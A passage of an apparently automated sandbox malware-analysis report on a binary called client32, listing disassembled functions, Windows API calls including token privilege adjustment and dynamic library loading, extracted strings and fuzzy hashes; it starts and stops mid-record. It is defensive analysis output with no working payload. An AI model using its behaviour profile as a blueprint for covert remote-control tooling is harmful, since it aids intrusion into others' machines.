1104ed40 call 1104d7d0 1906->1915 1907->1915 1909->1890 1912->1893 1914->1803 1915->1869 1950 1113a3d4-1113a3d9 call 110ec320 1915->1950 1931 1113a4a2-1113a4a8 1919->1931 1932 1113a4cd-1113a4d3 1919->1932 1935 1113a4aa-1113a4c8 call 11147060 GetTickCount 1931->1935 1936 1113a4d9-1113a4e5 GetTickCount 1931->1936 1932->1898 1932->1936 1935->1898 1936->1898 1939 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 1936->1939 1957 1113a530-1113a535 1939->1957 1950->1869 1957->1957 1958 1113a537-1113a53d 1957->1958 1959 1113a540-1113a545 1958->1959 1959->1959 1960 1113a547-1113a571 call 1112d6e0 1959->1960 1963 1113a573-1113a574 FreeLibrary 1960->1963 1964 1113a57a-1113a587 call 11162777 1960->1964 1963->1964 1964->1898
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                              • IsWindow.USER32(00040270), ref: 11139F65
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139F73
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139FAB
                                                                              • GetForegroundWindow.USER32 ref: 11139FC6
                                                                              • EnableWindow.USER32(00040270,00000000), ref: 11139FE0
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 11139FFC
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                              • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                              • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                              • IsWindowVisible.USER32(00040270), ref: 1113A088
                                                                              • IsIconic.USER32(00040270), ref: 1113A095
                                                                              • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040270,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040270,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                              • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 1113A0D4
                                                                              • GetLastError.KERNEL32 ref: 1113A193
                                                                              • GetLastError.KERNEL32 ref: 1113A20B
                                                                              • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                              • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                              • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                              • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                              • API String ID: 2511061093-2542869446
                                                                              • Opcode ID: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                              • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                              • Opcode Fuzzy Hash: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                              • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91
                                                                              Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1967 11134830-1113486c 1968 11134872-11134894 call 1105e820 1967->1968 1969 11134b94-11134baf call 11162bb7 1967->1969 1968->1969 1974 1113489a-111348ae GetLocalTime 1968->1974 1975 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 1974->1975 1976 111348b0-111348cc call 11147060 1974->1976 1983 11134955-1113496b GetProcAddress 1975->1983 1984 1113496d-11134974 GetProcessHandleCount 1975->1984 1976->1975 1983->1984 1985 11134976-11134978 SetLastError 1983->1985 1986 1113497e-11134986 1984->1986 1985->1986 1987 111349a2-111349ae 1986->1987 1988 11134988-111349a0 GetProcAddress 1986->1988 1991 111349b0-111349c8 GetProcAddress 1987->1991 1992 111349ca-111349d5 1987->1992 1988->1987 1989 111349d7-111349e2 SetLastError 1988->1989 1989->1991 1991->1992 1993 111349e4-111349ec SetLastError 1991->1993 1994 111349ef-111349ff GetProcAddress 1992->1994 1993->1994 1996 11134a01-11134a0d K32GetProcessMemoryInfo 1994->1996 1997 11134a0f-11134a11 SetLastError 1994->1997 1998 11134a17-11134a25 1996->1998 1997->1998 1999 11134a33-11134a3e 1998->1999 2000 11134a27-11134a2f 1998->2000 2001 11134a40-11134a48 1999->2001 2002 11134a4c-11134a57 1999->2002 2000->1999 2001->2002 2003 11134a65-11134a6f 2002->2003 2004 11134a59-11134a61 2002->2004 2005 11134a71-11134a78 2003->2005 2006 11134a7a-11134a7d 2003->2006 2004->2003 2007 11134a7f-11134a8d call 11147060 2005->2007 2006->2007 2008 11134a90-11134aa2 2006->2008 2007->2008 2012 11134b6a-11134b78 2008->2012 2013 11134aa8-11134aba call 110642e0 2008->2013 2014 11134b7a-11134b7b FreeLibrary 2012->2014 2015 11134b7d-11134b85 2012->2015 2013->2012 2021 11134ac0-11134ae1 call 1105e820 2013->2021 2014->2015 2017 11134b87-11134b88 FreeLibrary 2015->2017 2018 11134b8a-11134b8f 2015->2018 2017->2018 2018->1969 2020 11134b91-11134b92 FreeLibrary 2018->2020 2020->1969 2024 11134ae3-11134ae9 2021->2024 2025 11134aef-11134b0b call 1105e820 2021->2025 2024->2025 2026 11134aeb 2024->2026 2029 11134b16-11134b32 call 1105e820 2025->2029 2030 11134b0d-11134b10 2025->2030 2026->2025 2034 11134b34-11134b37 2029->2034 2035 11134b3d-11134b59 call 1105e820 2029->2035 2030->2029 2031 11134b12 2030->2031 2031->2029 2034->2035 2036 11134b39 2034->2036 2039 11134b60-11134b63 2035->2039 2040 11134b5b-11134b5e 2035->2040 2036->2035 2039->2012 2041 11134b65 call 11027de0 2039->2041 2040->2039 2040->2041 2041->2012
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,AB86ACF8), ref: 1113489E
                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                              • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                              • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                              • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                              • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                              • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                              • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                              • API String ID: 263027137-1001504656
                                                                              • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                              • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                              • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                              • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                              Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                              • _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              • _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                              • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                              • API String ID: 3299820421-2117887902
                                                                              • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                              • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                              Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                              • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                              • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                              • CoUninitialize.OLE32(00000000), ref: 111169E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                              • String ID: SHELL32.DLL$SHGetSettings
                                                                              • API String ID: 4195908086-2348320231
                                                                              • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                              • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                              Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: NBCTL32.DLL$_License$serial_no
                                                                              • API String ID: 2102423945-35127696
                                                                              • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                              • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                              Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID: Client32$NSMWClass$NSMWClass
                                                                              • API String ID: 3192549508-611217420
                                                                              • Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                              • Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                              Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,01611D68,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                              • EqualSid.ADVAPI32(?,01611D68,?,00000001,00000001), ref: 1109EDC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InformationToken$AllocateEqualInitialize
                                                                              • String ID:
                                                                              • API String ID: 1878589025-0
                                                                              • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                              • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                              Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,AB86ACF8,00080000,00000000,?), ref: 1109D88D
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                              • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                              • String ID:
                                                                              • API String ID: 2349140579-0
                                                                              • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                              • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                              • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                              • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                              Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                              • FindCloseChangeNotification.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                              Memory Dump Source
